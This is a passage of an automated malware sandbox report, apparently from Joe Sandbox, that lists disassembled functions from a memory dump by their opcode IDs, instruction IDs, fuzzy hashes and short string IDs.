                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 243cc84adc0159b362d4aef4947bb67a5f1fe23754d2197f8f79314f8468c291
                                                                                                                                  • Instruction ID: 3458a3ed79df98cb4a53361dbd429ca3c8f1376611b19e494b488e19594c7f1a
                                                                                                                                  • Opcode Fuzzy Hash: 243cc84adc0159b362d4aef4947bb67a5f1fe23754d2197f8f79314f8468c291
                                                                                                                                  • Instruction Fuzzy Hash: 9001DF31B040685BDF94AA79DC146AF76FAEBC8610F00493EE50AD7384EE64DC0247E5
                                                                                                                                  Function 06CEEDF8 Relevance: .0, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8f2a77140c75268aff90ba51810dede370e73937a424904da9696f997a60d8f7
                                                                                                                                  • Instruction ID: e9fa728b1e3717b43869ea20aceaa4ca5fcf15dafa0c042571dfae3a48a68cc8
                                                                                                                                  • Opcode Fuzzy Hash: 8f2a77140c75268aff90ba51810dede370e73937a424904da9696f997a60d8f7
                                                                                                                                  • Instruction Fuzzy Hash: 1801AF31B005114FDB649A7E94A4B2EB7E6DBCDAA0F10883EE20AC7354EE26DD0243D5
                                                                                                                                  Function 06CEA368 Relevance: .0, Instructions: 46COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1e2d6733ee8163a14ddabdec03d413c19d9b0751991d3ce6a4dcd1dfb6e9949a
                                                                                                                                  • Instruction ID: 8e73ace4ce0ebf8e887b0bcf438e9c8f4d00b2671f8838d5caef6cb6026d6b7d
                                                                                                                                  • Opcode Fuzzy Hash: 1e2d6733ee8163a14ddabdec03d413c19d9b0751991d3ce6a4dcd1dfb6e9949a
                                                                                                                                  • Instruction Fuzzy Hash: FB018130B001145FDB50AA7AD598B2EB7E6E785610F10882DE60AC7354EA25DD458385
                                                                                                                                  Function 06CEFF48 Relevance: .0, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 270dd17d24fa6f55db4bcb568bf16d223494b6bd1a79945257be639d66118582
                                                                                                                                  • Instruction ID: d07766651361a00a84193dd4f0376a6725e248f4d611df3e684d1f8bda064cf4
                                                                                                                                  • Opcode Fuzzy Hash: 270dd17d24fa6f55db4bcb568bf16d223494b6bd1a79945257be639d66118582
                                                                                                                                  • Instruction Fuzzy Hash: 79F0F874A012098FD781EF7DD61026EB7F6EB88200F10827D8929D7769EB749D81CB91
                                                                                                                                  Function 06CE64C9 Relevance: .0, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3f985364182a36559ef24aff5aa800a1dcb1fbecb1859b07256626890a3d4e2c
                                                                                                                                  • Instruction ID: 66f100316239e94100121a5d448ef461cc691ec3603029895cfdbed7e0afa5ca
                                                                                                                                  • Opcode Fuzzy Hash: 3f985364182a36559ef24aff5aa800a1dcb1fbecb1859b07256626890a3d4e2c
                                                                                                                                  • Instruction Fuzzy Hash: DEE0D871D242885BDF61DE75C915B5ABBF9DB12304F2088EAD448CB242F576CE019391

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 06CE76F8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1324371161
                                                                                                                                  • Opcode ID: c3bb0c811b76fc1a152da02b2dbe5a948fda4cc52d870832c3f58660739a578a
                                                                                                                                  • Instruction ID: b76db335a3e67518bf9e51d5918bdebf38b8fb776a4094628926ba413d3ee9fe
                                                                                                                                  • Opcode Fuzzy Hash: c3bb0c811b76fc1a152da02b2dbe5a948fda4cc52d870832c3f58660739a578a
                                                                                                                                  • Instruction Fuzzy Hash: D6122D34E01219CFDB64EF69C994A9EB7B6BF88300F208569D509AB364DB349D85CF90
                                                                                                                                  Function 06CEA990 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1078448309
                                                                                                                                  • Opcode ID: a7986a35dcc576101842c5e0204d0df1d6a1c6569862df6772385cb9e511909b
                                                                                                                                  • Instruction ID: 8f35b3de04f92078227c95eb5c6f68d651b8b6df838db3b40bfd65d1c9389e6f
                                                                                                                                  • Opcode Fuzzy Hash: a7986a35dcc576101842c5e0204d0df1d6a1c6569862df6772385cb9e511909b
                                                                                                                                  • Instruction Fuzzy Hash: 0B914E30E513099FEB68EFA5D6547AEBBF2EF84300F208529D4019B394DB799D81CB90
                                                                                                                                  Function 06CE70F8 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: be1a4fc29e7244a615a068a3afd032b70d44607f061bdce08dbabffb6354c68f
                                                                                                                                  • Instruction ID: a8f92dbf87b07a38c6310f9ca734a165b7efb335c31186dbb6809e5fd46b3527
                                                                                                                                  • Opcode Fuzzy Hash: be1a4fc29e7244a615a068a3afd032b70d44607f061bdce08dbabffb6354c68f
                                                                                                                                  • Instruction Fuzzy Hash: ECF16E34B01208DFDB54EF69D594A6EBBB6FF84304F248569D4059B3A8DB35EC82CB50
                                                                                                                                  Function 06CE8428 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: d5efd9a24b002dccb5e693d8b3d55afb062ba296357da160324753e381f3d674
                                                                                                                                  • Instruction ID: a744f810eb1ac9425ccca102518dac3634825f2cd1def8ba8021fb5b83acfa88
                                                                                                                                  • Opcode Fuzzy Hash: d5efd9a24b002dccb5e693d8b3d55afb062ba296357da160324753e381f3d674
                                                                                                                                  • Instruction Fuzzy Hash: B9B13C34A122098FDB64EF69D59469EB7B6FF84300F24882ED406DB394DB75DD82CB90
                                                                                                                                  Function 06CE8840 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: LRkq$LRkq$$kq$$kq
                                                                                                                                  • API String ID: 0-2392252538
                                                                                                                                  • Opcode ID: ae4a446c8438ae751e464db6009d815f9d487cdc22ff8a26efc9b2d0ecfaedbd
                                                                                                                                  • Instruction ID: f009fe932b6e5fb14b4812684d1814a03fb54bd02dbc6014a3a7dc47608d9501
                                                                                                                                  • Opcode Fuzzy Hash: ae4a446c8438ae751e464db6009d815f9d487cdc22ff8a26efc9b2d0ecfaedbd
                                                                                                                                  • Instruction Fuzzy Hash: 5051D830B012018FDB64DF25DA40A6AB7F6FF88310F14856EE5069B3A5DB34EC80CB90